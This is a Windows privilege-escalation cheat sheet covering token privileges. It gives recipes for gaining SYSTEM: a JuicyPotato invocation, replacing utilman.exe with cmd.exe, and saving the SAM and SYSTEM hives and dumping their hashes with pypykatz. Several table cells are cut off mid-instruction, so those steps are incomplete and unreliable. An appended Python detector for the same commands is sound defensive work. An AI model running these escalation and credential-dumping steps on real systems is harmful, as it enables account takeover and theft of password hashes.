PRIVILEGES INFORMATION
| Privilege | Impact | Tool | Execution path | Remarks |
|---|---|---|---|---|
| SeAssignPrimaryToken / SeImpersonate | Admin | 3rd party tool | "It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe" | Thank you Aurélien Chalot for the update. I will try to re-phrase it to something more recipe-like soon. |
| SeBackup | Threat | Built-in commands | Read sensitive files with | May be more interesting if you can read %WINDIR%\MEMORY.DMP |
| | Admin | 3rd party tool | Create arbitrary token including local admin rights with | |
| | Admin | PowerShell | Duplicate the | Script to be found at FuzzySecurity |
| | Admin | 3rd party tool | 1. Load buggy kernel driver such as | 1. The |
| SeRestore | Admin | PowerShell | 1. Launch PowerShell/ISE with the SeRestore privilege present. 2. Enable the privilege with Enable-SeRestorePrivilege. 3. Rename utilman.exe to utilman.old. 4. Rename cmd.exe to utilman.exe. 5. Lock the console and press Win+U. | Attack may be detected by some AV software. An alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| | Admin | Built-in commands | 1. | Attack may be detected by some AV software. An alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| | Admin | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified. | |
Exploitation of each privilege mentioned above:
SeAssignPrimaryToken/SeImpersonatePrivilege:

Get JuicyPotato onto the victim machine and obtain a CLSID that works for the potato technique. The following command executes a script as the privileged (SYSTEM) user; `-t *` tries both token-creation methods, `-p` is the program to run, `-l` is the COM server listen port and `-c` is the CLSID, which you must substitute:

```powershell
.\JuicyPotato.exe -t * -p c:\path\to\executable.bat -l 9002 -c '{CLSID}'
```
SeBackup:

Save the SAM and SYSTEM hives to disk:

```cmd
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system
```

Download the files and use pypykatz to dump the hashes (`--sam` takes the SAM hive, the positional argument is the SYSTEM hive):

```cmd
pypykatz registry --sam sam system
```
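Defender-side counterpart to the two command sequences above, as an added example that is not part of the original cheat sheet: a small Python triage routine that runs over constructed process-creation records (user plus command line, the fields a Sysmon Event ID 1 or Security 4688 record reduces to) and flags SAM/SYSTEM hive saves and the JuicyPotato-style invocation. The user names, paths and the CLSID placeholder are made up.

```python
import re

# Constructed sample process-creation records (user + command line); these are
# not real telemetry. The potato line mirrors the cheat-sheet command above.
SAMPLE_EVENTS = [
    {"user": r"CORP\svc_backup", "cmd": r"reg save hklm\sam c:\Temp\sam"},
    {"user": r"CORP\svc_backup", "cmd": r"reg  save HKLM\SYSTEM c:\Temp\system"},
    {"user": r"CORP\alice", "cmd": r"reg query HKLM\SOFTWARE\Microsoft\Windows /s"},
    {"user": r"CORP\bob", "cmd": r"C:\Windows\System32\notepad.exe c:\notes.txt"},
    {"user": r"NT AUTHORITY\NETWORK SERVICE",
     "cmd": r".\JuicyPotato.exe -t * -p c:\path\to\executable.bat -l 9002 -c '{CLSID-PLACEHOLDER}'"},
]

# reg.exe saving a credential-bearing hive (SAM/SYSTEM, and SECURITY for LSA secrets).
HIVE_SAVE = re.compile(
    r"\breg(?:\.exe)?\s+save\s+(?:hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)
# Potato-style token impersonation: a COM listen port together with a -c '{CLSID}' argument.
POTATO_CLSID = re.compile(r"-c\s+['\"]?\{[^}]*\}", re.I)
POTATO_PORT = re.compile(r"-l\s+\d{1,5}\b", re.I)


def classify(event):
    """Return a finding tag for one process-creation record, or None if benign."""
    cmd = event["cmd"]
    hive = HIVE_SAVE.search(cmd)
    if hive:
        return "hive-dump:" + hive.group(1).lower()
    if POTATO_CLSID.search(cmd) and POTATO_PORT.search(cmd):
        return "potato-impersonation"
    return None


def detect(events):
    """Run classify() over all records; returns [(user, tag), ...] in input order."""
    return [(e["user"], tag) for e in events if (tag := classify(e))]


def hive_pairs(findings):
    """Users that saved both SAM and SYSTEM (the pair needed for offline hash recovery)."""
    hives = {}
    for user, tag in findings:
        if tag.startswith("hive-dump:"):
            hives.setdefault(user, set()).add(tag.split(":", 1)[1])
    return {u: h for u, h in hives.items() if {"sam", "system"} <= h}


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for user, tag in found:
        print(f"{tag:24} {user}")
    for user, hives in hive_pairs(found).items():
        print(f"HIGH: {user} saved {', '.join(sorted(hives))}")
```

A single hive save by a backup account can be legitimate, so the SAM+SYSTEM pair per user is the signal worth alerting on; the potato match should additionally be correlated with the parent process being a service account such as NETWORK SERVICE.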